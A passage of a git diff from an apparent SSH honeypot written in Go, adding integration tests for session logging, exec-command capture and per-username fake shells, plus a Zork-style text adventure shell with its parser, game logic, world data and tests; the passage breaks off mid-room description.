if err := session.RequestPty("xterm", 80, 40, ssh.TerminalModes{}); err != nil {
t.Fatalf("request pty: %v", err)
}
stdin, err := session.StdinPipe()
if err != nil {
t.Fatalf("stdin pipe: %v", err)
}
var output bytes.Buffer
session.Stdout = &output
if err := session.Shell(); err != nil {
t.Fatalf("shell: %v", err)
}
// Wait for the prompt, then send commands.
time.Sleep(500 * time.Millisecond)
stdin.Write([]byte("pwd\r"))
time.Sleep(200 * time.Millisecond)
stdin.Write([]byte("whoami\r"))
time.Sleep(200 * time.Millisecond)
stdin.Write([]byte("exit\r"))
// Wait for session to end.
session.Wait()
out := output.String()
if !strings.Contains(out, "Welcome to Ubuntu") {
t.Errorf("output should contain banner, got: %s", out)
}
if !strings.Contains(out, "/root") {
t.Errorf("output should contain /root from pwd, got: %s", out)
}
if !strings.Contains(out, "root") {
t.Errorf("output should contain 'root' from whoami, got: %s", out)
}
// Verify session logs were recorded.
if len(store.SessionLogs) < 2 {
t.Errorf("expected at least 2 session logs, got %d", len(store.SessionLogs))
}
// Verify session was created with shell name.
var foundBash bool
for _, s := range store.Sessions {
if s.ShellName == "bash" {
foundBash = true
break
}
}
if !foundBash {
t.Error("expected a session with shell_name='bash'")
}
}) })
// Test wrong password is rejected. // Test wrong password is rejected.
@@ -189,6 +253,137 @@ func TestIntegrationSSHConnect(t *testing.T) {
} }
}) })
// Test exec command capture.
t.Run("exec_command", func(t *testing.T) {
clientCfg := &ssh.ClientConfig{
User: "root",
Auth: []ssh.AuthMethod{ssh.Password("toor")},
HostKeyCallback: ssh.InsecureIgnoreHostKey(),
Timeout: 5 * time.Second,
}
client, err := ssh.Dial("tcp", addr, clientCfg)
if err != nil {
t.Fatalf("SSH dial: %v", err)
}
defer client.Close()
session, err := client.NewSession()
if err != nil {
t.Fatalf("new session: %v", err)
}
defer session.Close()
// Run a command via exec (no PTY, no shell).
if err := session.Run("uname -a"); err != nil {
// Run returns an error because the server closes the channel,
// but that's expected.
_ = err
}
// Give the server a moment to store the command.
time.Sleep(200 * time.Millisecond)
// Verify the exec command was captured.
sessions, err := store.GetRecentSessions(context.Background(), 50, false)
if err != nil {
t.Fatalf("GetRecentSessions: %v", err)
}
var foundExec bool
for _, s := range sessions {
if s.ExecCommand != nil && *s.ExecCommand == "uname -a" {
foundExec = true
break
}
}
if !foundExec {
t.Error("expected a session with exec_command='uname -a'")
}
})
// Test username route: add username_routes so that "postgres" gets psql shell.
t.Run("username_route", func(t *testing.T) {
// Reconfigure with username routes.
srv.cfg.Shell.UsernameRoutes = map[string]string{"postgres": "psql"}
defer func() { srv.cfg.Shell.UsernameRoutes = nil }()
// Need to get the "postgres" user in via static creds or threshold.
// Use static creds for simplicity.
srv.cfg.Auth.StaticCredentials = append(srv.cfg.Auth.StaticCredentials,
config.Credential{Username: "postgres", Password: "postgres"},
)
srv.authenticator = auth.NewAuthenticator(srv.cfg.Auth)
defer func() {
srv.cfg.Auth.StaticCredentials = srv.cfg.Auth.StaticCredentials[:1]
srv.authenticator = auth.NewAuthenticator(srv.cfg.Auth)
}()
clientCfg := &ssh.ClientConfig{
User: "postgres",
Auth: []ssh.AuthMethod{ssh.Password("postgres")},
HostKeyCallback: ssh.InsecureIgnoreHostKey(),
Timeout: 5 * time.Second,
}
client, err := ssh.Dial("tcp", addr, clientCfg)
if err != nil {
t.Fatalf("SSH dial: %v", err)
}
defer client.Close()
session, err := client.NewSession()
if err != nil {
t.Fatalf("new session: %v", err)
}
defer session.Close()
if err := session.RequestPty("xterm", 80, 40, ssh.TerminalModes{}); err != nil {
t.Fatalf("request pty: %v", err)
}
stdin, err := session.StdinPipe()
if err != nil {
t.Fatalf("stdin pipe: %v", err)
}
var output bytes.Buffer
session.Stdout = &output
if err := session.Shell(); err != nil {
t.Fatalf("shell: %v", err)
}
// Wait for the psql banner.
time.Sleep(500 * time.Millisecond)
// Send \q to quit.
stdin.Write([]byte(`\q` + "\r"))
time.Sleep(200 * time.Millisecond)
session.Wait()
out := output.String()
if !strings.Contains(out, "psql") {
t.Errorf("output should contain psql banner, got: %s", out)
}
// Verify session was created with shell name "psql".
sessions, err := store.GetRecentSessions(context.Background(), 50, false)
if err != nil {
t.Fatalf("GetRecentSessions: %v", err)
}
var foundPsql bool
for _, s := range sessions {
if s.ShellName == "psql" && s.Username == "postgres" {
foundPsql = true
break
}
}
if !foundPsql {
t.Error("expected a session with shell_name='psql' for user 'postgres'")
}
})
// Test threshold acceptance: after enough failed dials, a subsequent // Test threshold acceptance: after enough failed dials, a subsequent
// dial with the same credentials should succeed via threshold or // dial with the same credentials should succeed via threshold or
// remembered credential. // remembered credential.

View File

@@ -0,0 +1,117 @@
package adventure
import (
"context"
"errors"
"fmt"
"io"
"strings"
"time"
"code.t-juice.club/torjus/oubliette/internal/shell"
)
const sessionTimeout = 10 * time.Minute
// AdventureShell implements a Zork-style text adventure set in a dungeon/data center.
type AdventureShell struct{}
// NewAdventureShell returns a new AdventureShell instance.
func NewAdventureShell() *AdventureShell {
return &AdventureShell{}
}
func (a *AdventureShell) Name() string { return "adventure" }
func (a *AdventureShell) Description() string { return "Zork-style text adventure dungeon crawler" }
func (a *AdventureShell) Handle(ctx context.Context, sess *shell.SessionContext, rw io.ReadWriteCloser) error {
ctx, cancel := context.WithTimeout(ctx, sessionTimeout)
defer cancel()
dungeonName := configString(sess.ShellConfig, "dungeon_name", "THE OUBLIETTE")
game := newGame()
// Print banner and initial room.
banner := strings.ReplaceAll(adventureBanner(dungeonName), "\n", "\r\n")
fmt.Fprint(rw, banner)
// Show starting room.
startDesc := game.describeRoom(game.rooms[game.currentRoom])
startDesc = strings.ReplaceAll(startDesc, "\n", "\r\n")
fmt.Fprintf(rw, "%s\r\n\r\n", startDesc)
for {
if _, err := fmt.Fprint(rw, "> "); err != nil {
return nil
}
line, err := shell.ReadLine(ctx, rw)
if errors.Is(err, io.EOF) {
fmt.Fprint(rw, "\r\n")
return nil
}
if err != nil {
return nil
}
trimmed := strings.TrimSpace(line)
if trimmed == "" {
continue
}
result := game.dispatch(trimmed)
var output string
if result.output != "" {
output = result.output
output = strings.ReplaceAll(output, "\r\n", "\n")
output = strings.ReplaceAll(output, "\n", "\r\n")
fmt.Fprintf(rw, "%s\r\n", output)
}
// Log command and output to store.
if sess.Store != nil {
if err := sess.Store.AppendSessionLog(ctx, sess.SessionID, trimmed, output); err != nil {
return fmt.Errorf("append session log: %w", err)
}
}
if sess.OnCommand != nil {
sess.OnCommand("adventure")
}
if result.exit {
return nil
}
}
}
func adventureBanner(dungeonName string) string {
return fmt.Sprintf(`
___ _ _ ____ _ ___ _____ _____ _____
/ _ \| | | | __ )| | |_ _| ____|_ _|_ _| ___
| | | | | | | _ \| | | || _| | | | | / _ \
| |_| | |_| | |_) | |___ | || |___ | | | | | __/
\___/ \___/|____/|_____|___|_____| |_| |_| \___|
Welcome to %s.
You wake up in the dark. The air is cold and hums with electricity.
This is a place where things are put to be forgotten.
Type 'help' for commands. Type 'look' to examine your surroundings.
`, dungeonName)
}
// configString reads a string from the shell config map with a default.
func configString(cfg map[string]any, key, defaultVal string) string {
if cfg == nil {
return defaultVal
}
if v, ok := cfg[key]; ok {
if s, ok := v.(string); ok && s != "" {
return s
}
}
return defaultVal
}

View File

@@ -0,0 +1,383 @@
package adventure
import (
"bytes"
"context"
"io"
"strings"
"testing"
"time"
"code.t-juice.club/torjus/oubliette/internal/shell"
"code.t-juice.club/torjus/oubliette/internal/storage"
)
type rwCloser struct {
io.Reader
io.Writer
}
func (r *rwCloser) Close() error { return nil }
func runShell(t *testing.T, commands string) string {
t.Helper()
store := storage.NewMemoryStore()
sessID, _ := store.CreateSession(context.Background(), "127.0.0.1", "root", "adventure", "")
sess := &shell.SessionContext{
SessionID: sessID,
Username: "root",
Store: store,
CommonConfig: shell.ShellCommonConfig{
Hostname: "testhost",
},
}
rw := &rwCloser{
Reader: bytes.NewBufferString(commands),
Writer: &bytes.Buffer{},
}
sh := NewAdventureShell()
ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)
defer cancel()
if err := sh.Handle(ctx, sess, rw); err != nil {
t.Fatalf("Handle: %v", err)
}
return rw.Writer.(*bytes.Buffer).String()
}
func TestAdventureShellName(t *testing.T) {
sh := NewAdventureShell()
if sh.Name() != "adventure" {
t.Errorf("Name() = %q, want %q", sh.Name(), "adventure")
}
if sh.Description() == "" {
t.Error("Description() should not be empty")
}
}
func TestBanner(t *testing.T) {
output := runShell(t, "quit\r")
if !strings.Contains(output, "OUBLIETTE") {
t.Error("output should contain OUBLIETTE in banner")
}
if !strings.Contains(output, ">") {
t.Error("output should contain > prompt")
}
}
func TestStartingRoom(t *testing.T) {
output := runShell(t, "quit\r")
if !strings.Contains(output, "The Oubliette") {
t.Error("should start in The Oubliette")
}
if !strings.Contains(output, "narrow stone chamber") {
t.Error("should show starting room description")
}
}
func TestHelpCommand(t *testing.T) {
output := runShell(t, "help\rquit\r")
for _, keyword := range []string{"look", "go", "take", "drop", "use", "inventory", "help", "quit"} {
if !strings.Contains(output, keyword) {
t.Errorf("help output should mention %q", keyword)
}
}
}
func TestLookCommand(t *testing.T) {
output := runShell(t, "look\rquit\r")
if !strings.Contains(output, "The Oubliette") {
t.Error("look should show current room")
}
if !strings.Contains(output, "Exits:") {
t.Error("look should show exits")
}
}
func TestMovement(t *testing.T) {
output := runShell(t, "go east\rquit\r")
if !strings.Contains(output, "Stone Corridor") {
t.Error("going east from oubliette should reach Stone Corridor")
}
}
func TestBareDirection(t *testing.T) {
output := runShell(t, "e\rquit\r")
if !strings.Contains(output, "Stone Corridor") {
t.Error("bare 'e' should move east to Stone Corridor")
}
}
func TestDirectionAliases(t *testing.T) {
output := runShell(t, "east\rquit\r")
if !strings.Contains(output, "Stone Corridor") {
t.Error("'east' should move to Stone Corridor")
}
}
func TestInvalidDirection(t *testing.T) {
output := runShell(t, "go north\rquit\r")
if !strings.Contains(output, "can't go") {
t.Error("should say you can't go that direction")
}
}
func TestTakeItem(t *testing.T) {
// Move to corridor where flashlight is.
output := runShell(t, "e\rtake flashlight\rinventory\rquit\r")
if !strings.Contains(output, "Taken") {
t.Error("should confirm taking item")
}
if !strings.Contains(output, "flashlight") {
t.Error("inventory should show flashlight")
}
}
func TestDropItem(t *testing.T) {
output := runShell(t, "e\rtake flashlight\rdrop flashlight\rinventory\rquit\r")
if !strings.Contains(output, "Dropped") {
t.Error("should confirm dropping item")
}
if !strings.Contains(output, "not carrying anything") {
t.Error("inventory should be empty after dropping")
}
}
func TestEmptyInventory(t *testing.T) {
output := runShell(t, "inventory\rquit\r")
if !strings.Contains(output, "not carrying anything") {
t.Error("should say not carrying anything")
}
}
func TestExamineItem(t *testing.T) {
output := runShell(t, "e\rexamine flashlight\rquit\r")
if !strings.Contains(output, "batteries") {
t.Error("examining flashlight should describe it")
}
}
func TestDarkRoom(t *testing.T) {
// Go to the pit without flashlight.
output := runShell(t, "down\rquit\r")
if !strings.Contains(output, "darkness") {
t.Error("pit should be dark without flashlight")
}
// Should NOT show the lit description.
if strings.Contains(output, "skeleton") {
t.Error("should not see skeleton without flashlight")
}
}
func TestDarkRoomWithFlashlight(t *testing.T) {
// Get flashlight first, then go to pit.
output := runShell(t, "e\rtake flashlight\rw\rdown\rquit\r")
if !strings.Contains(output, "skeleton") {
t.Error("should see skeleton with flashlight in pit")
}
if !strings.Contains(output, "rusty key") {
t.Error("should see rusty key with flashlight in pit")
}
}
func TestDarkRoomCantTake(t *testing.T) {
output := runShell(t, "down\rtake rusty_key\rquit\r")
if !strings.Contains(output, "too dark") {
t.Error("should not be able to take items in dark room")
}
}
func TestLockedDoor(t *testing.T) {
// Navigate to archive without keycard.
output := runShell(t, "e\rs\rs\re\rquit\r")
if !strings.Contains(output, "keycard") || !strings.Contains(output, "red") {
t.Error("should mention keycard reader when trying locked door")
}
}
func TestUnlockWithKeycard(t *testing.T) {
// Get keycard from server room, navigate to archive, use keycard.
output := runShell(t, "e\re\rtake keycard\rw\rs\rs\ruse keycard\re\rquit\r")
if !strings.Contains(output, "green") || !strings.Contains(output, "clicks open") {
t.Error("should show unlock message")
}
if !strings.Contains(output, "Control Room") {
t.Error("should be able to enter control room after unlocking")
}
}
func TestRustyKeyPuzzle(t *testing.T) {
// Get flashlight, get rusty key from pit, go to generator room, use key.
output := runShell(t, "e\rtake flashlight\rw\rdown\rtake rusty_key\rup\re\re\rs\re\ruse rusty_key\rquit\r")
if !strings.Contains(output, "maintenance panel") || !strings.Contains(output, "logbook") {
t.Error("should show maintenance log when using rusty key in generator room")
}
if !strings.Contains(output, "Dunwich") {
t.Error("logbook should mention Dunwich")
}
}
func TestExitEndsGame(t *testing.T) {
// Full path to exit: get keycard, navigate to archive, unlock, go to control room, east to exit.
output := runShell(t, "e\re\rtake keycard\rw\rs\rs\ruse keycard\re\re\r")
if !strings.Contains(output, "SECURITY AUDIT") {
t.Error("exit should show the ending message")
}
if !strings.Contains(output, "SESSION HAS BEEN LOGGED") {
t.Error("exit should mention session logging")
}
}
func TestUnknownCommand(t *testing.T) {
output := runShell(t, "xyzzy\rquit\r")
if !strings.Contains(output, "don't understand") {
t.Error("should show error for unknown command")
}
}
func TestQuitCommand(t *testing.T) {
output := runShell(t, "quit\r")
if !strings.Contains(output, "terminated") {
t.Error("quit should show termination message")
}
}
func TestExitAlias(t *testing.T) {
output := runShell(t, "exit\r")
if !strings.Contains(output, "terminated") {
t.Error("exit alias should work like quit")
}
}
func TestVentilationShaft(t *testing.T) {
output := runShell(t, "e\rup\rquit\r")
if !strings.Contains(output, "Ventilation Shaft") {
t.Error("should reach ventilation shaft from corridor")
}
if !strings.Contains(output, "note") {
t.Error("should see note in ventilation shaft")
}
}
func TestNote(t *testing.T) {
output := runShell(t, "e\rup\rtake note\rexamine note\rquit\r")
if !strings.Contains(output, "GET OUT") {
t.Error("note should contain warning text")
}
}
func TestUseItemWrongRoom(t *testing.T) {
// Get keycard from server room, try to use in wrong room.
output := runShell(t, "e\re\rtake keycard\ruse keycard\rquit\r")
if !strings.Contains(output, "nothing to use") {
t.Error("should say nothing to use keycard on in wrong room")
}
}
func TestEthernetCable(t *testing.T) {
output := runShell(t, "e\rs\rtake ethernet_cable\ruse ethernet_cable\rquit\r")
if !strings.Contains(output, "chewed") {
t.Error("using ethernet cable should mention chewed ends")
}
}
func TestSessionLogs(t *testing.T) {
store := storage.NewMemoryStore()
sessID, _ := store.CreateSession(context.Background(), "127.0.0.1", "root", "adventure", "")
sess := &shell.SessionContext{
SessionID: sessID,
Username: "root",
Store: store,
CommonConfig: shell.ShellCommonConfig{
Hostname: "testhost",
},
}
rw := &rwCloser{
Reader: bytes.NewBufferString("help\rquit\r"),
Writer: &bytes.Buffer{},
}
sh := NewAdventureShell()
ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)
defer cancel()
sh.Handle(ctx, sess, rw)
if len(store.SessionLogs) < 2 {
t.Errorf("expected at least 2 session logs, got %d", len(store.SessionLogs))
}
}
func TestParserBasics(t *testing.T) {
tests := []struct {
input string
verb string
object string
}{
{"look", "look", ""},
{"l", "look", ""},
{"examine flashlight", "look", "flashlight"},
{"go north", "go", "north"},
{"n", "go", "north"},
{"south", "go", "south"},
{"take the key", "take", "key"},
{"get a flashlight", "take", "flashlight"},
{"drop rusty key", "drop", "rusty key"},
{"use keycard", "use", "keycard"},
{"inventory", "inventory", ""},
{"i", "inventory", ""},
{"inv", "inventory", ""},
{"help", "help", ""},
{"?", "help", ""},
{"quit", "quit", ""},
{"exit", "quit", ""},
{"q", "quit", ""},
{"LOOK", "look", ""},
{" go east ", "go", "east"},
}
for _, tt := range tests {
t.Run(tt.input, func(t *testing.T) {
cmd := parseCommand(tt.input)
if cmd.verb != tt.verb {
t.Errorf("parseCommand(%q).verb = %q, want %q", tt.input, cmd.verb, tt.verb)
}
if cmd.object != tt.object {
t.Errorf("parseCommand(%q).object = %q, want %q", tt.input, cmd.object, tt.object)
}
})
}
}
func TestParserEmpty(t *testing.T) {
cmd := parseCommand("")
if cmd.verb != "" {
t.Errorf("empty input should give empty verb, got %q", cmd.verb)
}
}
func TestParserArticleStripping(t *testing.T) {
cmd := parseCommand("take the an a flashlight")
if cmd.verb != "take" || cmd.object != "flashlight" {
t.Errorf("articles should be stripped, got verb=%q object=%q", cmd.verb, cmd.object)
}
}
func TestConfigString(t *testing.T) {
cfg := map[string]any{"dungeon_name": "MY DUNGEON"}
if got := configString(cfg, "dungeon_name", "DEFAULT"); got != "MY DUNGEON" {
t.Errorf("configString() = %q, want %q", got, "MY DUNGEON")
}
if got := configString(cfg, "missing", "DEFAULT"); got != "DEFAULT" {
t.Errorf("configString() for missing key = %q, want %q", got, "DEFAULT")
}
if got := configString(nil, "key", "DEFAULT"); got != "DEFAULT" {
t.Errorf("configString(nil) = %q, want %q", got, "DEFAULT")
}
}

View File

@@ -0,0 +1,358 @@
package adventure
import (
"fmt"
"slices"
"strings"
)
type gameState struct {
currentRoom string
inventory []string
rooms map[string]*room
items map[string]*item
flags map[string]bool
turns int
}
type commandResult struct {
output string
exit bool
}
func newGame() *gameState {
rooms, items := newWorld()
return &gameState{
currentRoom: "oubliette",
rooms: rooms,
items: items,
flags: make(map[string]bool),
}
}
func (g *gameState) dispatch(input string) commandResult {
cmd := parseCommand(input)
if cmd.verb == "" {
return commandResult{}
}
g.turns++
switch cmd.verb {
case "look":
return g.cmdLook(cmd.object)
case "go":
return g.cmdGo(cmd.object)
case "take":
return g.cmdTake(cmd.object)
case "drop":
return g.cmdDrop(cmd.object)
case "use":
return g.cmdUse(cmd.object)
case "inventory":
return g.cmdInventory()
case "help":
return g.cmdHelp()
case "quit":
return commandResult{output: "The darkness closes in. Session terminated.", exit: true}
default:
return commandResult{output: fmt.Sprintf("I don't understand '%s'. Type 'help' for available commands.", input)}
}
}
func (g *gameState) cmdHelp() commandResult {
help := `Available commands:
look / examine [item] - Look around or examine something
go <direction> - Move (north, south, east, west, up, down)
take <item> - Pick up an item
drop <item> - Drop an item
use <item> - Use an item
inventory - Check what you're carrying
help - Show this help
quit / exit - End session
You can also just type a direction (n, s, e, w, u, d) to move.`
return commandResult{output: help}
}
func (g *gameState) cmdLook(object string) commandResult {
r := g.rooms[g.currentRoom]
// Look at a specific item.
if object != "" {
return g.examineItem(object)
}
// Look at the room.
return commandResult{output: g.describeRoom(r)}
}
func (g *gameState) describeRoom(r *room) string {
var b strings.Builder
fmt.Fprintf(&b, "== %s ==\n", r.name)
// Dark room check.
if r.darkDesc != "" && !g.hasItem("flashlight") {
b.WriteString(r.darkDesc)
return b.String()
}
b.WriteString(r.description)
// List visible items.
visibleItems := g.roomItems(r)
if len(visibleItems) > 0 {
b.WriteString("\n\nYou can see: ")
names := make([]string, len(visibleItems))
for i, id := range visibleItems {
names[i] = g.items[id].name
}
b.WriteString(strings.Join(names, ", "))
}
// List exits.
if len(r.exits) > 0 {
b.WriteString("\n\nExits: ")
dirs := make([]string, 0, len(r.exits))
for dir := range r.exits {
dirs = append(dirs, dir)
}
b.WriteString(strings.Join(dirs, ", "))
}
return b.String()
}
func (g *gameState) roomItems(r *room) []string {
// In dark rooms without flashlight, can't see items.
if r.darkDesc != "" && !g.hasItem("flashlight") {
return nil
}
return r.items
}
func (g *gameState) examineItem(name string) commandResult {
id := g.resolveItem(name)
if id == "" {
return commandResult{output: fmt.Sprintf("You don't see '%s' here.", name)}
}
return commandResult{output: g.items[id].description}
}
func (g *gameState) cmdGo(direction string) commandResult {
if direction == "" {
return commandResult{output: "Go where? Try a direction: north, south, east, west, up, down."}
}
r := g.rooms[g.currentRoom]
destID, ok := r.exits[direction]
if !ok {
return commandResult{output: fmt.Sprintf("You can't go %s from here.", direction)}
}
// Check locked doors.
if r.locked != nil {
if flag, locked := r.locked[direction]; locked && !g.flags[flag] {
return g.lockedMessage(direction)
}
}
g.currentRoom = destID
dest := g.rooms[destID]
// Entering the exit room ends the game.
if destID == "exit" {
return commandResult{output: g.describeRoom(dest), exit: true}
}
return commandResult{output: g.describeRoom(dest)}
}
func (g *gameState) lockedMessage(direction string) commandResult {
if direction == "east" && g.currentRoom == "archive" {
return commandResult{output: "The steel door won't budge. The keycard reader blinks red, waiting."}
}
return commandResult{output: "The way is locked."}
}
func (g *gameState) cmdTake(name string) commandResult {
if name == "" {
return commandResult{output: "Take what?"}
}
r := g.rooms[g.currentRoom]
// Can't take items in dark rooms.
if r.darkDesc != "" && !g.hasItem("flashlight") {
return commandResult{output: "It's too dark to find anything."}
}
id := g.resolveRoomItem(name)
if id == "" {
return commandResult{output: fmt.Sprintf("You don't see '%s' here.", name)}
}
it := g.items[id]
if !it.takeable {
return commandResult{output: fmt.Sprintf("You can't take the %s.", it.name)}
}
// Remove from room, add to inventory.
g.removeRoomItem(r, id)
g.inventory = append(g.inventory, id)
return commandResult{output: fmt.Sprintf("Taken: %s", it.name)}
}
func (g *gameState) cmdDrop(name string) commandResult {
if name == "" {
return commandResult{output: "Drop what?"}
}
id := g.resolveInventoryItem(name)
if id == "" {
return commandResult{output: fmt.Sprintf("You're not carrying '%s'.", name)}
}
// Remove from inventory, add to room.
g.removeInventoryItem(id)
r := g.rooms[g.currentRoom]
r.items = append(r.items, id)
return commandResult{output: fmt.Sprintf("Dropped: %s", g.items[id].name)}
}
func (g *gameState) cmdUse(name string) commandResult {
if name == "" {
return commandResult{output: "Use what?"}
}
id := g.resolveInventoryItem(name)
if id == "" {
return commandResult{output: fmt.Sprintf("You're not carrying '%s'.", name)}
}
switch id {
case "keycard":
return g.useKeycard()
case "rusty_key":
return g.useRustyKey()
case "flashlight":
return commandResult{output: "The flashlight is already on. Its beam cuts through the darkness."}
case "ethernet_cable":
return commandResult{output: "You wave the cable around hopefully. Nothing happens. Both ends are chewed through anyway."}
case "floppy_disk":
return commandResult{output: "You don't have anything to put it in. Floppy drives went extinct decades ago."}
case "note":
return commandResult{output: g.items[id].description}
default:
return commandResult{output: fmt.Sprintf("You can't figure out how to use the %s here.", g.items[id].name)}
}
}
func (g *gameState) useKeycard() commandResult {
if g.currentRoom != "archive" {
return commandResult{output: "There's nothing to use the keycard on here."}
}
if g.flags["archive_unlocked"] {
return commandResult{output: "You already unlocked that door."}
}
g.flags["archive_unlocked"] = true
return commandResult{output: "You swipe the keycard. The reader flashes green and the steel door clicks open with a heavy thunk."}
}
func (g *gameState) useRustyKey() commandResult {
if g.currentRoom != "generator" {
return commandResult{output: "There's nothing to use the rusty key on here."}
}
if g.flags["panel_opened"] {
return commandResult{output: "The maintenance panel is already open."}
}
g.flags["panel_opened"] = true
return commandResult{output: `The key fits. The maintenance panel swings open with a screech, revealing a logbook:
MAINTENANCE LOG - GENERATOR B
Last service: 2003-11-15
Technician: J. Dunwich
Notes: "Generator A offline permanently. B running on fumes.
Fuel delivery canceled - 'facility decommissioned' per management.
But the servers are still running. WHO IS USING THEM?
Filed ticket #4,271. No response. As usual."
The entries stop after that date.`}
}
func (g *gameState) cmdInventory() commandResult {
if len(g.inventory) == 0 {
return commandResult{output: "You're not carrying anything."}
}
var b strings.Builder
b.WriteString("You are carrying:\n")
for _, id := range g.inventory {
fmt.Fprintf(&b, " - %s\n", g.items[id].name)
}
return commandResult{output: strings.TrimRight(b.String(), "\n")}
}
// hasItem checks if the player has an item in inventory.
func (g *gameState) hasItem(id string) bool {
return slices.Contains(g.inventory, id)
}
// resolveItem finds an item by name in both room and inventory.
func (g *gameState) resolveItem(name string) string {
if id := g.resolveInventoryItem(name); id != "" {
return id
}
return g.resolveRoomItem(name)
}
// resolveRoomItem finds an item in the current room by partial name match.
func (g *gameState) resolveRoomItem(name string) string {
r := g.rooms[g.currentRoom]
name = strings.ToLower(name)
for _, id := range r.items {
if matchesItem(id, g.items[id].name, name) {
return id
}
}
return ""
}
// resolveInventoryItem finds an item in inventory by partial name match.
func (g *gameState) resolveInventoryItem(name string) string {
name = strings.ToLower(name)
for _, id := range g.inventory {
if matchesItem(id, g.items[id].name, name) {
return id
}
}
return ""
}
// matchesItem checks if a search term matches an item's ID or display name.
func matchesItem(id, displayName, search string) bool {
return id == search ||
strings.ToLower(displayName) == search ||
strings.Contains(id, search) ||
strings.Contains(strings.ToLower(displayName), search)
}
func (g *gameState) removeRoomItem(r *room, id string) {
for i, itemID := range r.items {
if itemID == id {
r.items = append(r.items[:i], r.items[i+1:]...)
return
}
}
}
func (g *gameState) removeInventoryItem(id string) {
for i, invID := range g.inventory {
if invID == id {
g.inventory = append(g.inventory[:i], g.inventory[i+1:]...)
return
}
}
}

View File

@@ -0,0 +1,106 @@
package adventure
import "strings"
type parsedCommand struct {
verb string
object string
}
// directionAliases maps shorthand and full direction names to canonical forms.
var directionAliases = map[string]string{
"n": "north",
"s": "south",
"e": "east",
"w": "west",
"u": "up",
"d": "down",
"north": "north",
"south": "south",
"east": "east",
"west": "west",
"up": "up",
"down": "down",
}
// verbAliases maps aliases to canonical verbs.
var verbAliases = map[string]string{
"look": "look",
"l": "look",
"examine": "look",
"inspect": "look",
"x": "look",
"go": "go",
"move": "go",
"walk": "go",
"take": "take",
"get": "take",
"grab": "take",
"pick": "take",
"drop": "drop",
"put": "drop",
"use": "use",
"apply": "use",
"inventory": "inventory",
"inv": "inventory",
"i": "inventory",
"help": "help",
"?": "help",
"quit": "quit",
"exit": "quit",
"logout": "quit",
"q": "quit",
}
// articles are stripped from input.
var articles = map[string]bool{
"the": true,
"a": true,
"an": true,
}
// parseCommand parses raw input into a verb and object.
func parseCommand(input string) parsedCommand {
input = strings.TrimSpace(strings.ToLower(input))
if input == "" {
return parsedCommand{}
}
words := strings.Fields(input)
// Strip articles.
var filtered []string
for _, w := range words {
if !articles[w] {
filtered = append(filtered, w)
}
}
if len(filtered) == 0 {
return parsedCommand{}
}
first := filtered[0]
// Bare direction → go <direction>.
if dir, ok := directionAliases[first]; ok {
return parsedCommand{verb: "go", object: dir}
}
// Known verb alias.
if verb, ok := verbAliases[first]; ok {
object := ""
if len(filtered) > 1 {
object = strings.Join(filtered[1:], " ")
// Resolve direction alias in object for "go north" etc.
if verb == "go" {
if dir, ok := directionAliases[object]; ok {
object = dir
}
}
}
return parsedCommand{verb: verb, object: object}
}
// Unknown verb — return as-is so game can give an error.
return parsedCommand{verb: first, object: strings.Join(filtered[1:], " ")}
}

View File

@@ -0,0 +1,211 @@
package adventure
// room represents a location in the game world.
type room struct {
name string
description string
darkDesc string // shown when room is dark (empty = not a dark room)
exits map[string]string // direction → room ID
items []string // item IDs present in the room
locked map[string]string // direction → flag required to unlock
}
// item represents an object that can be picked up and used.
type item struct {
name string
description string
takeable bool
}
func newWorld() (map[string]*room, map[string]*item) {
rooms := map[string]*room{
"oubliette": {
name: "The Oubliette",
description: `You are in a narrow stone chamber. The walls are damp and slick with condensation.
Far above, an iron grate lets in a faint green glow — not daylight, but the steady
pulse of status LEDs. A frayed ethernet cable hangs from the grate like a vine.
A passage leads east into darkness. Stone steps spiral downward.`,
exits: map[string]string{
"east": "corridor",
"down": "pit",
},
},
"corridor": {
name: "Stone Corridor",
description: `A long corridor carved from living rock. The walls transition from rough-hewn
stone to poured concrete as you look east. Fluorescent tubes flicker overhead,
half of them dead. Cable trays run along the ceiling, sagging under the weight
of bundled Cat5. A draft comes from a ventilation shaft above.`,
exits: map[string]string{
"west": "oubliette",
"east": "server_room",
"south": "cable_crypt",
"up": "ventilation",
},
items: []string{"flashlight"},
},
"ventilation": {
name: "Ventilation Shaft",
description: `You've squeezed into a narrow ventilation shaft. The aluminum walls vibrate with
the hum of distant fans. It's barely wide enough to turn around in. Dust and
cobwebs coat everything. Someone has scratched tally marks into the metal — you
stop counting at forty-seven.`,
exits: map[string]string{
"down": "corridor",
},
items: []string{"note"},
},
"server_room": {
name: "Server Room",
description: `Rows of black server racks stretch into the gloom, their LEDs blinking in
patterns that almost seem deliberate. The air is frigid and filled with the
white noise of a thousand fans. A yellowed label on the nearest rack reads:
"PRODUCTION - DO NOT TOUCH". Someone has added in marker: "OR ELSE".
A laminated keycard sits on top of a powered-down blade server.`,
exits: map[string]string{
"west": "corridor",
"south": "cold_storage",
},
items: []string{"keycard"},
},
"pit": {
name: "The Pit",
darkDesc: `You are in absolute darkness. You can hear water dripping somewhere far below
and the faint hum of electronics. The air smells of rust and ozone. You can't
see a thing without a light source. The stairs lead back up.`,
description: `Your flashlight reveals a deep shaft — part medieval oubliette, part cable run.
Rusty chains hang from iron rings set into the walls, intertwined with bundles
of fiber optic cable that glow faintly orange. At the bottom, a skeleton in a
lab coat slumps against the wall, still wearing an ID badge. A rusty key glints
on a hook near the skeleton's hand.`,
exits: map[string]string{
"up": "oubliette",
},
items: []string{"rusty_key"},
},
"cable_crypt": {
name: "Cable Crypt",
description: `This vaulted chamber was clearly something else before the cables arrived.
Stone sarcophagi line the walls, but their lids have been removed and they're
now stuffed full of tangled ethernet runs and power strips. A faded sign reads
"STRUCTURED CABLING" — someone has crossed out "STRUCTURED" and written
"CHAOTIC" above it. The air smells of old stone and warm plastic.`,
exits: map[string]string{
"north": "corridor",
"south": "archive",
},
items: []string{"ethernet_cable"},
},
"cold_storage": {
name: "Cold Storage",
description: `A cavernous room kept at near-freezing temperatures. Frost coats the walls.
Rows of old tape drives and disk platters are stacked on industrial shelving,
their labels faded beyond reading. A humming cryo-unit in the corner has a
blinking amber light. A hand-written sign says "BACKUP STORAGE - CRITICAL".`,
exits: map[string]string{
"north": "server_room",
"east": "generator",
},
items: []string{"floppy_disk"},
},
"archive": {
name: "The Archive",
description: `Floor-to-ceiling shelves hold thousands of manila folders, binders, and
three-ring notebooks. The organization system, if there ever was one, has
long since collapsed into entropy. A thick layer of dust covers everything.
A heavy steel door to the east has an electronic keycard reader with a
